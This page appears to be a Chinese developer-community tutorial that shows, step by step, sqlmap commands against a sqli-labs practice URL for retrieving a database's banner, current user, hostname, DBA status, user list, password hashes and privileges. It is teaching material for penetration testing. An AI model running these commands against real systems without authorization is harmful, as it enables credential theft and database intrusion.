AI 助理
备案控制台
开发者社区 数据库 文章 正文

注入工具 -- sqlmap(检索DBMS信息)

2023-02-15 100
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 注入工具 -- sqlmap(检索DBMS信息)


一、sqlmap检索DBMS Banner

–banner或者-b

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -b

0a2653c851af460fa595bd959398a8f1.png


二、sqlmap检索DBMS当前用户

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --current-user

0eacb84100b54626af849e6b562bf92a.png


三、sqlmap检索DBMS当前数据库

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --current-db

2d65d23f6d4748949b924e4057485923.png


四、sqlmap检索DBMS当前主机名

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --hostname

2e9b90b2ca334476abebe75bafe6eeaa.png


五、sqlmap探测当前用户是否是数据库管理员

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --is-dba

4cebaac233b3433da32a72337a77fc60.png


六、枚举DBMS用户

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --user

6de278e6d6694ce5bb08e7e842b7e74b.png


七、枚举DBMS用户密码

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --password

7a399525ddec4b77923c464820b33738 (1).png


八、枚举DBMS权限

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --role


7a399525ddec4b77923c464820b33738.png


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --privileges


8ec4f2997fb246878c34ecd6d122b7c6.png


禁止非法,后果自负


文章标签:
数据库管理
数据安全/隐私保护
数据库
sumith
目录
相关文章
sumith
|
9月前
|
SQL
注入工具 -- sqlmap(自定义检测参数)
注入工具 -- sqlmap(自定义检测参数)
sumith
97 0
香甜可口草莓蛋糕
|
9月前
|
SQL 安全 关系型数据库
SQL 注入神器:SQLMap 简单使用
SQL 注入神器:SQLMap 简单使用
香甜可口草莓蛋糕
196 1
游客h2vchmlwqitbk
|
8月前
【干货】sql-labs、请求方式、注入类型、拼接方式
【干货】sql-labs、请求方式、注入类型、拼接方式
游客h2vchmlwqitbk
45 0
游客qsxez56gggwqy
|
4月前
|
SQL 安全 关系型数据库
SQL自动化注茹-SQLmap入门操作(二)
SQL自动化注茹-SQLmap入门操作(二)
游客qsxez56gggwqy
261 0
香甜可口草莓蛋糕
|
9月前
|
SQL 安全 关系型数据库
SQL 注入神器:SQLMap 参数详解
SQL 注入神器:SQLMap 参数详解
香甜可口草莓蛋糕
335 1
香甜可口草莓蛋糕
|
9月前
|
SQL Oracle 关系型数据库
常见 SQL 注入绕过方法
常见 SQL 注入绕过方法
香甜可口草莓蛋糕
414 0
sumith
|
9月前
|
数据库 数据安全/隐私保护 数据库管理
注入工具 -- sqlmap(检索DBMS信息)
注入工具 -- sqlmap(检索DBMS信息)
sumith
277 0
sumith
|
9月前
|
安全 数据库
注入工具 -- sqlmap(枚举信息)
注入工具 -- sqlmap(枚举信息)
sumith
93 0
sumith
|
9月前
|
SQL
​注入工具 -- sqlmap(获取目标)
​注入工具 -- sqlmap(获取目标)
sumith
72 0
sumith
|
9月前
注入工具 -- sqlmap(指定位置注入和优化性能)
注入工具 -- sqlmap(指定位置注入和优化性能)
sumith
151 0

热门文章

最新文章

  • 1
    开箱即用的axios封装:Vue3+TS(建议收藏)
  • 2
    Python实现阿里云域名DDNS支持ipv4和ipv6
  • 3
    国外短域名的使用及跳转方法
  • 4
    第 1 章 Terminal
  • 5
    [图示]做人36字诀:二)形象塑造 ——教你品格高雅
  • 6
    oracle_asm理解
  • 7
    移动安全策略不只要关注恶意软件
  • 8
    Metadata Service 最高频的应用 - 每天5分钟玩转 OpenStack(164)
  • 9
    struts jsp传值到action,乱码的解决方案
  • 10
    设置linux的console为串口【转】
  • 1
    【2025穿越时空 怀旧经典】VMware Workstation Pro助你重返WindowsXP,让怀旧不再是空谈!
    23
  • 2
    【2025最新】 神奇!VMware Workstation Pro虚拟机还原与删除功能,让你轻松应对各种场景!
    31
  • 3
    【2025最新】VMware Workstation Pro 虚拟机配置与安装VMware Tools 感受它的强大~
    23
  • 4
    【2025最新】VMware Workstation Pro 虚拟机基础配置教程,方便你的神操作!
    27
  • 5
    【02】整体试验思路,在这之前我们发现sec_uid,sec_uid是什么和uid的关系又是什么?相互如何转换?python开发之理论研究试验,如何通过抖音视频下方的用户的UID获得抖音用户的手机号-本系列文章仅供学习研究-禁止用于任何商业用途-仅供学习交流-优雅草卓伊凡
    23
  • 6
    十、MyBatis的缓存
    20
  • 7
    【独家揭秘2025】VMware Workstation Pro虚拟机:免费安装教程大放送,一键解锁操作系统模拟神器!
    16
  • 8
    算法系列之递归反转单链表
    19
  • 9
    【Java并发】【线程池】带你从0-1入门线程池
    88
  • 10
    《解锁脑电信号密码:探秘标准化与归一化处理》
    12

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    通义万相:视觉生成大模型再进化